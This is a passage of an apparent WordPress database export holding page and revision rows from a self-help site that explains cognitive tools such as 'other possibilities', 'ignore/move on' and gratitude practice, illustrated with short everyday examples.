/wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Reality check tool', '', 'inherit', 'closed', 'closed', '', '1655-revision-v1', '', '', '2023-05-30 18:33:55', '2023-05-30 18:33:55', '', 1655, 'https://www.happythinking.com/?p=1660', 0, 'revision', '', 0),
(1661, 1, '2023-05-30 18:36:34', '2023-05-30 18:36:34', '<!-- wp:paragraph -->\n<p>As you know, unhelpful thinking patterns are about seeing things in a way that does not represent reality. The â€œreality checkâ€ tool that we discussed before works by one not finding evidence to back up unhelpful thoughts. Here, I will describe another approach you can take, which is by using what I call the â€œother possibilitiesâ€ tool. This would be best understood with the use of an example.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let us imagine that Sally and her good friend Rupa are working in an office. One day, as Sally and Rupa see each other in the morning, Rupa doesnâ€™t smile and even appears to ignore Sally. Sally immediately jumps to the conclusion, â€œRupa must be angry with me.â€ For the rest of the morning, Sally is in a distressed state, trying to work out why Rupa must be angry with her. This goes on till lunchtime when Sally sees Rupa again. This time, Rupa smiles broadly and says, â€œThis morning was so stressful. My boss had wanted me to do some calculations for him, and I had worked on it all weekend on my laptop. Yet this morning, the document with all the calculations seemed to have gone missing from my laptop and I was so terrified about going to the meeting. Luckily, at the meeting, there was this guy who is really good with computers and he somehow located the missing document, and whew, everything was fine after that!â€&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As you can see, in this example, Sally had unnecessarily suffered a whole morning because of the unhelpful thought, â€œRupa must be angry with meâ€, which did not match the reality of the situation. Let us now imagine a different direction this scenario could have taken. Let us start with Sally having the thought, â€œRupa must be angry with me.â€ Sally then says â€œpauseâ€ to herself to still the thought. At this point, she asks herself, â€œWhat other possibilities are there for Rupa not smiling at me?â€. Asking this question forces Sally to think of other possibilities and she thinks to herself, â€œMaybe Rupa is suffering from migraine like she sometimes does, or maybe she is stressed about some work issue or maybe she had a tiring morning coming to work.â€ This â€œthinking of other possibilitiesâ€ makes Sally realise that the original thought that she had is not the only possible thought. In other words, there is a good chance that the thought, â€œRupa is angry with me, may not even be correct, as there are other thoughts that also could be correct.â€ This example described how to use the â€œother possibilitiesâ€ tool. As you saw, it can reduce the â€œpowerâ€ of the original unhelpful thought by making one think of alternative thoughts. I.e. one realises that oneâ€™s unhelpful thought is just one of the many other possible thoughts.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/reality-check/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/ignore-move-on/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'â€œOther possibilitiesâ€ tool', '', 'publish', 'closed', 'closed', '', 'other-possibilities', '', '', '2023-08-09 18:37:02', '2023-08-09 18:37:02', '', 0, 'https://www.happythinking.com/?page_id=1661', 0, 'page', '', 0),
(2073, 1, '2023-08-09 18:36:58', '2023-08-09 18:36:58', '<!-- wp:paragraph -->\n<p>As you know, unhelpful thinking patterns are about seeing things in a way that does not represent reality. The â€œreality checkâ€ tool that we discussed before works by one not finding evidence to back up unhelpful thoughts. Here, I will describe another approach you can take, which is by using what I call the â€œother possibilitiesâ€ tool. This would be best understood with the use of an example.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let us imagine that Sally and her good friend Rupa are working in an office. One day, as Sally and Rupa see each other in the morning, Rupa doesnâ€™t smile and even appears to ignore Sally. Sally immediately jumps to the conclusion, â€œRupa must be angry with me.â€ For the rest of the morning, Sally is in a distressed state, trying to work out why Rupa must be angry with her. This goes on till lunchtime when Sally sees Rupa again. This time, Rupa smiles broadly and says, â€œThis morning was so stressful. My boss had wanted me to do some calculations for him, and I had worked on it all weekend on my laptop. Yet this morning, the document with all the calculations seemed to have gone missing from my laptop and I was so terrified about going to the meeting. Luckily, at the meeting, there was this guy who is really good with computers and he somehow located the missing document, and whew, everything was fine after that!â€&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As you can see, in this example, Sally had unnecessarily suffered a whole morning because of the unhelpful thought, â€œRupa must be angry with meâ€, which did not match the reality of the situation. Let us now imagine a different direction this scenario could have taken. Let us start with Sally having the thought, â€œRupa must be angry with me.â€ Sally then says â€œpauseâ€ to herself to still the thought. At this point, she asks herself, â€œWhat other possibilities are there for Rupa not smiling at me?â€. Asking this question forces Sally to think of other possibilities and she thinks to herself, â€œMaybe Rupa is suffering from migraine like she sometimes does, or maybe she is stressed about some work issue or maybe she had a tiring morning coming to work.â€ This â€œthinking of other possibilitiesâ€ makes Sally realise that the original thought that she had is not the only possible thought. In other words, there is a good chance that the thought, â€œRupa is angry with me, may not even be correct, as there are other thoughts that also could be correct.â€ This example described how to use the â€œother possibilitiesâ€ tool. As you saw, it can reduce the â€œpowerâ€ of the original unhelpful thought by making one think of alternative thoughts. I.e. one realises that oneâ€™s unhelpful thought is just one of the many other possible thoughts.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/reality-check/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/ignore-move-on/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'â€œOther possibilitiesâ€ tool', '', 'inherit', 'closed', 'closed', '', '1661-revision-v1', '', '', '2023-08-09 18:36:58', '2023-08-09 18:36:58', '', 1661, 'https://www.happythinking.com/?p=2073', 0, 'revision', '', 0),
(1662, 1, '2023-05-30 18:36:34', '2023-05-30 18:36:34', '<!-- wp:paragraph -->\n<p>As you know, much unhelpful thinking is about seeing things in a way that does not represent reality. The â€œreality checkâ€ tool that we discussed before works by one not finding evidence to back up unhelpful thoughts. Here, I will describe another approach you can take, which is by using what I call the â€œother possibilitiesâ€ tool. This would be best understood with the use of an example.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let us imagine that Sally and her good friend Rupa are working in an office. One day, as Sally and Rupa see each other for the first time in the morning, Rupa doesnâ€™t smile and even appears to ignore Sally. Sally immediately jumps to the conclusion, â€œRupa must be angry with me.â€ For the rest of the morning, Sally is in a distressed state, trying to work out why Rupa must be angry with her. This goes on till lunchtime when Sally sees Rupa again. This time, Rupa smiles broadly and says, â€œThis morning was so stressful. My boss had wanted me to do some calculations for him, and I had worked on it all weekend on my laptop. Yet this morning, the document with all the calculations seemed to have gone missing from my laptop and I was so terrified about going to the meeting. Luckily, at the meeting, there was this guy who is really good with computers and he somehow located the missing document, and whew, everything was fine after that!â€&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As you can see, in this example, Sally had unnecessarily suffered a whole morning because of the unhelpful thought, â€œRupa must be angry with meâ€, which did not match the reality of the situation. Let us now imagine a different direction this scenario could have taken. Let us start with Sally having the thought, â€œRupa must be angry with me.â€ Sally then says â€œpauseâ€ to herself to still the thought. At this point, she asks herself, â€œWhat other possibilities are there for Rupa not smiling at me?â€. Asking this question forces Sally to think of other possibilities and she thinks to herself, â€œMaybe Rupa is suffering from migraine like she sometimes does, or maybe she is stressed about some work issue or maybe she had a tiring morning coming to work.â€ This â€œthinking of other possibilitiesâ€ makes Sally realise that the original thought that she had is not the only possible thought. In other words, there is a good chance that the thought, â€œRupa is angry with me, may not even be correct, as there are other thoughts that also could be correct.â€ In this way, the â€œother possibilitiesâ€ tool can reduce the â€œpowerâ€ of the original unhelpful thought. As Sally decides to ignore the unhelpful thought and move on to doing her office tasks, it will soon fade away.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As the above example shows, by finding other possible thoughts, one can see things in a more â€œbalancedâ€ way, instead of focusing oneâ€™s attention only on one fixed and potentially inaccurate thought.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/ignore_move_on_tool/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/unhelpful_thinking_patterns/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'â€œOther possibilitiesâ€ tool', '', 'inherit', 'closed', 'closed', '', '1661-revision-v1', '', '', '2023-05-30 18:36:34', '2023-05-30 18:36:34', '', 1661, 'https://www.happythinking.com/?p=1662', 0, 'revision', '', 0),
(1663, 1, '2023-05-30 18:38:18', '2023-05-30 18:38:18', '<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the previous section, you learnt about the â€œreality checkâ€ tool. When using that tool, most of the time, one will find that when looking for evidence to support the unhelpful thought, that thought just disappears, almost as if that thought realises on its own that it is no longer valid. However, sometimes one may find that even though one has shown that there is little evidence to support an unhelpful thought, that thought may still â€œhang aroundâ€. If this were to happen, it is crucial that one does not â€œpushâ€ the unhelpful thought away. As I explained to you when describing the pause tool, trying to stop or push away a thought can actually have the opposite effect, where the thought comes back even more. A much better option is to let the thought hang around as much as it likes, but crucially, since one knows that the thought is not valid, one can just ignore it. â€œIgnoringâ€ means that even though the thought is present, one does not react to it. One does not react to the thought because one knows, by using the reality check tool, that the unhelpful thought does not represent reality. Ultimately a thought that one does not react to will disappear, just like if one does not react to a friend, that friend will soon get bored and will leave!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>A very effective way to help ignore a thought is to add another step, which I call â€œMove onâ€. Essentially, after one decides to ignore a thought, one moves oneâ€™s mindâ€™s attention onto something else. Let me explain using the example we used in the previous sections, where Jayâ€™s partner was a bit late returning home from work. You will note that one can often use multiple combinations of tools together. This is sort of like how a mechanic will often use more than one tool when repairing a machine.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So putting all this together, let''s see an example of the â€œIgnore/ Move onâ€ tool in use.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>We start with Jayâ€™s partner not being home 10 minutes past the usual time she normally returns home from work. Jay has the unhelpful thought, â€œShe must have had a terrible road traffic accidentâ€. Jay then uses the â€œpause toolâ€ where he uses his internal voice and says â€œpauseâ€ to himself. He then applies the reality check tool to the paused thought, and asks himself, â€œWhat actual evidence do I have that supports my thought that my partner has had a terrible road traffic accident?â€. As Jay looks for evidence, he realises that he actually does not have any evidence that his partner has met with a road traffic accident. Since he still has the unhelpful thought lingering in the background of his mind, he decides to use the ignore &amp; move on tool. Using his internal voice, he says to himself â€œIgnore and Move onâ€. He doesnâ€™t react to the unhelpful thinking and lets it be. He then moves on to a different thought, which on this occasion happens to be thinking of what he will be cooking for dinner. Eventually, Jayâ€™s unhelpful thinking fades away, avoiding him having unnecessary distress.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As I tell you about these tools, you may think they are complex. In reality, they are very easy to do in practice. The tools may appear to be â€œlengthyâ€, but that is only because I am breaking them down into individual steps. While it may take you a while to read and understand the tools, actually using the tools will take you much less time. And of course, like everything, with a bit of practice, it will only get quicker.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/reality_check_tool/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/other_possibilities_tool/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Ignore / Move on tool', '', 'inherit', 'closed', 'closed', '', '1658-revision-v1', '', '', '2023-05-30 18:38:18', '2023-05-30 18:38:18', '', 1658, 'https://www.happythinking.com/?p=1663', 0, 'revision', '', 0),
(1664, 1, '2023-05-30 18:41:33', '2023-05-30 18:41:33', '<!-- wp:paragraph -->\n<p>There is a very simple tool that can be used to help one to be happy, and that is the act of being â€œgratefulâ€. Studies have shown that being thankful (i.e. gratitude) helps to improve oneâ€™s mental health. The gratitude tool is about developing a habit of being grateful.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Often, especially when things are not great, it is easy to think that there is nothing to be grateful for. Perhaps this is because our minds tend to ignore positive aspects of our lives and instead, focus only on negativity. When one looks for things to be grateful for, one should not only focus on â€œbigâ€ things. While of course, one should not ignore big things, it is also important to actively look for â€œsmallâ€ things as well. Let me give you an example. Imagine that a person, who we will call Mark, has severe arthritis that limits his mobility and makes it difficult for him to venture out of his house. However, on this day, he does manage to go for a short walk up and down the street he lives in. That evening, as part of the â€œgratitude toolâ€ that he uses every day, Mark thinks of things to be grateful for. He tells himself, â€œToday I am grateful that I was able to walk up and down my street and was able to enjoy the outdoors a little bit. Another thing that I am grateful for is the phone call that my friend Sam made to me. It was great chatting with him and it made me feel better.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As you may have noticed in the example, the things that one can be grateful for don''t have to be major. Just a few everyday things can work as well. Initially, one may need to spend some extra effort looking for things to be grateful for, as oneâ€™s mind may have gotten used to ignoring such things. One could even choose very simple things like being grateful for the person smiling at you at the supermarket.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When using the gratitude tool, try to be a bit creative. One doesnâ€™t have to always choose the same things every day, such as, â€œI am grateful for my loving family.â€ If one keeps saying the same things every day (e.g. loving family), then oneâ€™s mind may not â€œlearnâ€ to look for things to be grateful for. Try to look for different small things every day to be grateful for.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, when looking for things to be grateful for, there are a few things you need to be careful about. One should not excessively focus on being grateful to people who one may feel under obligation to, either emotionally or materially (e.g. someone who has lent one money). I am not saying that one should not acknowledge such persons. But excessively doing so may bring oneâ€™s mood down, as one may feel constantly indebted to those people and develop a sense of being helpless. It''s also important to not let the gratitude tool be about being happy about others'' misfortunes. (e.g. â€œAt least I am not as poor as my neighbour, Mary.â€). That would make the gratitude tool a negative exercise. Rather, one should just be grateful for good things that have happened to oneself without comparing them to those less fortunate than oneself.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When using the gratitude tool, most people will use their â€œinner voiceâ€ to express their gratitude. However, some might find it useful to write these thoughts in a notebook or diary (â€œgratitude journalâ€). At times, one might even be able to directly express gratitude to someone (e.g. â€œThank you for visiting me, you made me feel better.â€)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Remembering to be grateful can be a challenge and one may need to develop a way of reminding oneself to be grateful. Perhaps, for example, one can put a daily reminder on oneâ€™s phone diary, to remind oneself every day, at a convenient time, to be grateful, perhaps with a screen message, â€œGrateful Tool time!â€. Another approach can be to just make it a habit at an easy to remember time of the day, such as when getting into bed in the evening.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As one regularly uses the gratitude tool, one will find that oneâ€™s mind will look at the world in a less negative manner.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>By the way, I am very grateful that you are visiting this website! I feel thankful that I have the opportunity to share my thoughts with you.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/other-possibilities/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/conclusion/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Gratitude tool', '', 'publish', 'closed', 'closed', '', 'gratitude', '', '', '2023-08-09 18:41:31', '2023-08-09 18:41:31', '', 0, 'https://www.happythinking.com/?page_id=1664', 0, 'page', '', 0),
(1665, 1, '2023-05-30 18:41:33', '2023-05-30 18:41:33', '<!-- wp:paragraph -->\n<p>There is a very simple tool that can be used to help one to be happy, and that is the act of being â€œgratefulâ€. Studies have shown that being thankful (i.e. gratitude) helps to improve oneâ€™s mental health. The gratitude tool is about developing a habit of being grateful.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Often, especially when things are not great, it is easy to think that there is nothing to be grateful for. Perhaps this is because our minds tend to ignore positive aspects of our lives and instead, focus only on negatives. When one looks for things to be grateful for, one should not only focus on â€œbigâ€ things. While of course, one should not ignore big things, it is also important to actively look for â€œsmallâ€ things as well. Let me give you an example. Imagine that a person, who we will call Mark, has severe arthritis that limits his mobility and makes it difficult for him to venture out of his house. However, on this day, he does manage to go for a short walk up and down the street he lives in. That evening, as part of the â€œgratitude toolâ€ that he uses every day, Mark thinks of things to be grateful for. He tells himself, â€œToday I am grateful that I was able to walk up and down my street and was able to enjoy the outdoors a little bit. Another thing that I am grateful for is the phone call that my friend Sam made to me. It was great chatting with him and it made me feel better.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As you may have noticed in the example, the things that one can be grateful for don''t have to be major. Just a few everyday things can work as well. Initially, one may need to spend some extra effort looking for things to be grateful for, as oneâ€™s mind may have gotten used to ignoring such things. One could even choose very simple things like being grateful for the person smiling at you at the supermarket.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When using the gratitude tool, try to be a bit creative. One doesnâ€™t have to always choose the same things every day, such as, â€œI am grateful for my loving family.â€ If one keeps saying the same things every day (e.g. loving family), then oneâ€™s mind may not â€œlearnâ€ how to look for things to be grateful for. One can instead, try to look for different small things every day to be grateful for.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, when looking for things to be grateful for, there are a few things you need to be careful about. One should not excessively focus on being grateful to people who one may feel under obligation to, either emotionally or materially (e.g. someone who has lent one money). I am not saying that one should not acknowledge such persons. But excessively doing so may bring oneâ€™s mood down, as one may feel constantly indebted to those people and develop a sense of being helpless. It''s also important to not let the gratitude tool be about being happy about others'' misfortunes. (e.g. â€œAt least I am not as poor as my neighbour, Mary.â€). That would make the gratitude tool a negative exercise. Rather, one should just be grateful for good things that have happened to oneself without comparing them to those less fortunate than oneself.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When using the gratitude tool, most people will use their â€œinner voiceâ€ to express their gratitude. However, some might find it useful to write these thoughts in a notebook or diary (â€œgratitude journalâ€). At times, one might even be able to directly express gratitude to someone (e.g. â€œThank you for visiting me, you made me feel better.â€)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Remembering to be grateful can be a challenge and one may need to develop a way of reminding oneself to be grateful. Perhaps, for example, one can put a daily reminder on oneâ€™s phone diary, to remind oneself every day, at a convenient time, to be grateful, perhaps with a screen message, â€œGrateful Tool time!â€. Another approach can be to just make it a habit at an easy-to-remember time of the day, such as when getting into bed in the evening.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As one regularly uses the gratitude tool, one will find that oneâ€™s mind will look at the world in a less negative manner.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>By the way, I am very grateful that you are visiting this website! I feel thankful that I have the opportunity to share my thoughts with you.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/other_possibilities_tool/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/unhelpful_thinking_patterns/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Gratitude tool', '', 'inherit', 'closed', 'closed', '', '1664-revision-v1', '', '', '2023-05-30 18:41:33', '2023-05-30 18:41:33', '', 1664, 'https://www.happythinking.com/?p=1665', 0, 'revision', '', 0),
(1666, 1, '2023-05-30 18:42:52', '2023-05-30 18:42:52', '<!-- wp:paragraph -->\n<p>As you know, much unhelpful thinking is about seeing things in a way that does not represent reality. The â€œreality checkâ€ tool that we discussed before works by one not finding evidence to back up unhelpful thoughts. Here, I will describe another approach you can take, which is by using what I call the â€œother possibilitiesâ€ tool. This would be best understood with the use of an example.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let us imagine that Sally and her good friend Rupa are working in an office. One day, as Sally and Rupa see each other for the first time in the morning, Rupa doesnâ€™t smile and even appears to ignore Sally. Sally immediately jumps to the conclusion, â€œRupa must be angry with me.â€ For the rest of the morning, Sally is in a distressed state, trying to work out why Rupa must be angry with her. This goes on till lunchtime when Sally sees Rupa again. This time, Rupa smiles broadly and says, â€œThis morning was so stressful. My boss had wanted me to do some calculations for him, and I had worked on it all weekend on my laptop. Yet this morning, the document with all the calculations seemed to have gone missing from my laptop and I was so terrified about going to the meeting. Luckily, at the meeting, there was this guy who is really good with computers and he somehow located the missing document, and whew, everything was fine after that!â€&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As you can see, in this example, Sally had unnecessarily suffered a whole morning because of the unhelpful thought, â€œRupa must be angry with meâ€, which did not match the reality of the situation. Let us now imagine a different direction this scenario could have taken. Let us start with Sally having the thought, â€œRupa must be angry with me.â€ Sally then says â€œpauseâ€ to herself to still the thought. At this point, she asks herself, â€œWhat other possibilities are there for Rupa not smiling at me?â€. Asking this question forces Sally to think of other possibilities and she thinks to herself, â€œMaybe Rupa is suffering from migraine like she sometimes does, or maybe she is stressed about some work issue or maybe she had a tiring morning coming to work.â€ This â€œthinking of other possibilitiesâ€ makes Sally realise that the original thought that she had is not the only possible thought. In other words, there is a good chance that the thought, â€œRupa is angry with me, may not even be correct, as there are other thoughts that also could be correct.â€ In this way, the â€œother possibilitiesâ€ tool can reduce the â€œpowerâ€ of the original unhelpful thought. As Sally decides to ignore the unhelpful thought and move on to doing her office tasks, it will soon fade away.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As the above example shows, by finding other possible thoughts, one can see things in a more â€œbalancedâ€ way, instead of focusing oneâ€™s attention only on one fixed and potentially inaccurate thought.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button 